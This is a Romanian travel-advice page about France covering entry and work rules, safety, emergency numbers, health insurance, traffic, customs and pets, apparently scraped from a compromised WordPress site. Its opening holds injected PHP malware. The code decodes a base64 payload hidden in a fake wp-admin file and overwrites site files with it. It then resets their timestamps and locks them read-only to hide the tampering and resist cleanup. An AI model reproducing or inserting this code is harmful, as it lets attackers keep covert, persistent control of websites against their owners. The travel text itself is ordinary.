$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Franţa – O noua atitudine

Franţa

 • Nu există restricţii de călătorie.

Ultima actualizare:

19 aprilie 2011

Condiţii de intrare şi regim de şedere

Cetăţenii români nu au nevoie de viză pentru a călători în Franţa.
Intrarea în Franţa este permisă cu paşaportul sau cartea de identitate în curs de valabilitate.

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Doriţi să munciţi în Franţa?

Cetăţenii români care doresc să exercite o activitate profesională în Franţa sunt obligaţi să obţină în prealabil o autorizaţie de muncă, demers iniţiat în totalitate de către angajator.
Aceasta autorizaţie este însoţită de permisul de şedere pentru exercitarea de activităţi profesionale eliberat de prefectura.

Autorităţile franceze pot limita dreptul de circulaţie sau de şedere al cetăţenilor români doar in situaţia în care aceştia reprezintă o ameninţare la adresa ordinii publice, a siguranţei publice sau a sănătăţii publice.

Pentru muncitorii salariaţi, autorizaţiile de muncă vor fi eliberate fără a se lua în considerare situaţia profesiei pentru ocuparea unui loc de muncă, atunci când activitatea solicitată figurează pe lista celor 150 de profesii anexată la hotărârea Ministerului imigraţiei, integrării, identităţii naţionale si codezvoltării din 18 ianuarie 2008. Este vorba despre următoarele 15 sectoare de activitate:

 • construcţii şi lucrări publice
 • domeniul industriei hoteliere, alimentare şi al restauraţiei
 • agricultură, marină şi pescuit
 • mecanică şi prelucrarea metalelor
 • electricitate, electronică
 • transport, logistică si turism
 • industria de transformare
 • industrii uşoare (materiale uşoare, lemn, industrii grafice)
 • gestiune şi administrare întreprinderi
 • informatică
 • studii şi cercetare
 • bănci şi asigurări
 • comerţ şi vânzări
 • servicii către particulari si colectivităţi
 • sănătate, activitate socială, culturală şi sportivă

Pentru muncitorii nesalariaţi sau independenţi, dreptul de sejur este garantat de îndată ce aceştia sunt înscrişi în Registrul Comerţului, în Repertoarul Profesiilor sau în cadrul unui ordin profesional.

Pentru muncitorii detaşaţi în cadrul unei firme de prestări de servicii de către o întreprindere stabilită în România, dreptul de sejur este garantat fără ca întreprinderea prestatară să fie obligată să solicite o autorizaţie de muncă pentru salariaţii care lucrează în cadrul ei.

Absolvenţii de Master recunoscut in Franţa pot desfăşura o activitate profesională fără autorizaţie de muncă şi fără drept de şedere.

Pentru verificarea condiţiilor particulare de intrare şi şedere vă recomandăm consultarea informaţiilor oficiale furnizate de autorităţile franceze:

De asemenea, puteţi obţine informaţii suplimentare accesând site-ul http://www.muncainstrainatate.anofm.ro/

Ameninţări teroriste

Terorismul este un fenomen global, nelocalizat, prin urmare nici Franţa nu poate fi exclusă din faţa acestei ameninţări.
Cetăţenilor români care călătoresc în Franţa li se recomandă să urmărească în permanenţă anunţurile şi recomandările făcute de autorităţile franceze şi să acceseze periodic pagina web a Ministerului român al Afacerilor Externe (www.mae.ro).

Siguranţă şi criminalitate

Franţa este o ţară cu un nivel de criminalitate redusă.
Infracţiuni minore de tipul furtului din buzunare, înşelăciunilor sau furtului din maşini pot apărea în zone aglomerate (gări, staţii, parcări, centre comerciale, benzinării sau zone de servicii pe autostrăzi).

Recomandări generale:

 • Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie banii, cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
 • Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă.
 • În cazul călătoriei cu autobuzul sau trenul păstraţi atenţia asupra bagajelor pe întreaga durată a călătoriei.
 • Pentru ieşirile în oraşe, în special în zonele aglomerate, lăsaţi documentele personale la hotel şi păstraţi numai o copie a actelor de identitate (paşaport, permis de şedere).

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, vă recomandăm contactarea celui mai apropiat birou al poliţiei, precum şi contactarea celui mai apropiat oficiul consular român.

În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor franceze, trebuie apelate următoarele numere de urgenţă:

 • 112 – Serviciul urgenţe
 • 17  – Poliţia
 • 15  – Serviciul medical de urgenţă (SAMU)
 • 18  – Pompieri
 • 115 – Număr pentru cei fără adăpost

Atenţie! Dacă sunaţi din greşeală la 112, nu închideţi! În caz contrar, vi se poate trimite o maşină în locul în care vă aflaţi, pentru a vedea dacă totul este în regulă!

Vă recomandăm, de asemenea, sesizarea Ambasadei României de la Paris sau a oficiilor consulare române de la Strasbourg, Marsilia sau Lyon, care pot acorda asistenţa consulară în condiţiile prevăzute de lege.

Sistemul medical

Asigurarea medicală este obligatorie în Franţa.
Vă recomandăm cu insistenţă să încheiaţi o asigurare medicală de sănătate sau să obţineţi Cardul European de Sănătate înainte de a pleca într-o călătorie.
Dacă vă îmbolnăviţi sau aveţi un accident pe durata unei şederi temporare într-un stat membru UE, formularul E112 sau Cardul european de asigurări sociale de sănătate vă va da acces la îngrijirile medicale necesare.
Acest Card vă va permite să primiţi asistenţa medicală necesară în timpul şederii dumneavoastră temporare în orice ţară a Uniunii Europene.

Mai multe detalii găsiţi la adresele: www.cnas.ro/ şi www.ceass.ro/.

Este bine ca asigurarea medicală suplimentară să fievalabilă în toate ţările. În baza unei asemenea asigurări, facultative, aveţi acces la serviciile de urgenţă atât din sistemul public de sănătate, cât şi din cel privat (în funcţie de tipul poliţei de asigurare). La încheierea unei asemenea asigurări verificaţi coordonatele partenerului societăţii de asigurare în ţara de destinaţie şi de tranzit.

Vă recomandăm să vă încheiaţi, înainte de plecare, o asigurare de călătorie. Aceasta are valabilitate în toate ţările şi poate să acopere de la riscurile de bază (îmbolnăviri, accidente, urgenţe stomatologice, repatriere sanitară sau în caz de deces) până la toate riscurile de călătorie, inclusiv pierderea/ furtul/ deteriorarea bagajelor, anularea plecării în străinătate, falimentul companiei aeriene etc.
Asigurarea de viaţă s-a dovedit benefică pentru familiile celor decedaţi în urma unor accidente sau din motive de boală.
În Uniunea Europeană nu aveţi nevoie de vaccinări speciale.

Informaţii privind localizarea şi modul de funcţionare a unităţilor sanitare pot fi obţinute prin consultarea paginii web a Ministerului Sănătăţii al Franţei (www.sante.gouv.fr).

Condiţii privind traficul auto

 • Circulaţia auto

În Franţa, circulaţia auto se efectuează pe partea dreaptă a drumului.
Se acordă prioritate maşinilor care vin din dreapta.

 • Centura de siguranţă

Purtarea centurii de siguranţă este obligatorie.

 • Limitele de viteză admise
  • 130 km/h pe autostradă;
  • 110 km/h pe drumurile naţionale;
  • 90 km/h pe celelalte drumuri inter-urbane;
  • 50 km/h în interiorul localităţilor;
  • 80 km/h pe bulevardul periferic al Parisului.
 • Folosirea telefonului mobil la volan

Este interzisă.

 • Starea drumurilor

Starea generală a drumurilor şi infrastructurii este foarte bună.

 • Parcarea

Marea majoritate a locurilor de parcare este cu plată.
Parcarea în zone interzise se sancţionează cu amenda până la 375 de euro sau cu ridicarea maşinii.

 • Aparatele anti-radar şi de detectare a radarului

In Franţa este interzisă folosirea ori simpla deţinere a aparatelor de detectare a radarelor. Fapta constituie contravenţie şi se amendează cu 1.500 euro (750 euro dacă amenda este plătită pe loc). In cazul refuzului de plata a amenzii, Codul Rutier francez prevede, de asemenea, şi reţinerea permisului de conducere şi confiscarea maşinii.

 • Permisul de conducere

Permisul de conducere valabil emis în România este recunoscut în Franţa.

 • Informaţii pentru cazurile de accident de circulaţie

În caz de accident uşor, completaţi, împreună cu cealaltă parte formularul tip pus la dispoziţie de societăţile locale de asigurări, privind producerea accidentului. Notaţi elementele de identificare ale celuilalt autovehicul implicat în accident şi ale societăţii de asigurare a acestuia.
Dacă în urma accidentului sunt răniţi, chemaţi poliţia locală, după ce aţi acordat primul ajutor. Adresaţi-vă pentru sprijin partenerului societăţii române de asigurări din ţara respectivă care figurează pe Cartea verde.

Păstraţi documentele de plată până la înapoierea în ţară pentru a le prezenta societăţii de asigurare.

Telefoane utile pentru informaţii privind traficul sau conduita în caz de accident:

112 – Serviciul urgenţe
17  – Poliţia
15  – Serviciul medical de urgenţă (SAMU)

Reglementări vamale

Nu există controale la graniţele interne, dintre statele semnatare ale Acordului Schengen: Austria, Belgia, Danemarca, Estonia, Finlanda, Franţa, Germania, Grecia, Italia, Letonia, Lituania, Luxemburg, Malta, Olanda, Polonia, Portugalia, Republica Cehă, Slovacia, Slovenia, Spania, Suedia, Ungaria, precum şi Islanda, Norvegia şi Elveţia (ultimele trei nefiind membre ale UE).
Din motive de ordine publică, sănătate publică sau de securitate naţională, la graniţele interne ale UE se pot introduce controale, pentru perioade limitate.
Limitele cantitative pentru introducerea anumitor produse sunt: ţigări: 200 bucăţi, 1 litru băuturi alcoolice, parfum 50 ml sau 250 ml apă de toaletă.
Detalii suplimentare privind reglementările vamale franceze pot fi obţinute prin intermediul paginii internet al serviciului vamal francez (www.douanes.gouv.fr).

Regimul medicamentelor

Sunt excluse atât la intrare cât şi la ieşire drogurile de orice tip şi substanţele dopante.

Atenţie! Nu luaţi cu dumneavoastră decât cantităţile de medicamente strict necesare!
Vă recomandăm să aveţi la dumneavoastră reţeta medicului pentru medicamentele care depăşesc sfera celor uzuale.
Antibioticele nu se eliberează decât pe bază de reţetă.

Regimul animalelor de companie

Pentru spaţiul UE, aveţi nevoie de paşaport european pentru animalele de companie. Acest document se poate procura de la medicul veterinar şi trebuie să conţină informaţii despre vaccinarea antirabică.
Animalul trebuie identificat printr-un microcip electronic. Până în iulie 2011, se acceptă, de asemenea, şi un tatuaj lizibil.

Atenţie! Este interzisă intrarea în Franţa a câinilor de atac asa cum sunt definiţi prin Hotărârea Interministeriala din 27.04.1999 (Staffordshire Terrier, American Staffordshire Terrier, Mastiff sau Boerbull, Tosa, Molosi).
Pentru condiţiile speciale aplicabile fiecărei categorii de animale de companie, informaţii suplimentare pot fi obţinute de la Ministerul francez al Agriculturii (e-mail: IMPORT.MCSI.DGAL@agriculture.gouv.fr) sau de la Ambasada Franţei din Bucureşti (www.ambafrance-ro.org).

By o9admin